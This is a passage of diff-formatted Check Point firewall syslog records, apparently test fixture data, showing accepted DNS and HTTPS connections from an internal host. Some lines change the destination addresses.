service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36e,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501038"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50265"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36e,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501038"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59575"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36e,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501038"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50747"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36e,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501038"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43931"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36e,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501038"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42662"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36e,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501038"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38182"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35224"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41291"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56079"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36181"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44038"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40103"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x4,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51391"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x5,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57541"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36012"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39094"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48363"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x6,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"216.58.211.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44020"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x3,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39393"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x3,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39393"; 
service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:21Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d371,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"54.149.124.142"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"42542"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:21Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d371,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"195.88.54.16"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51880"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501042"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33356"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501042"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55437"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501042"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33356"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501042"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55437"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"88.221.161.146"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"42746"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"88.221.161.146"; log_delay:"1585501042"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"42748"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"88.221.161.146"; log_delay:"1585501042"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"42750"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x4,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"88.221.161.146"; log_delay:"1585501042"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"42752"; service:"443"; 
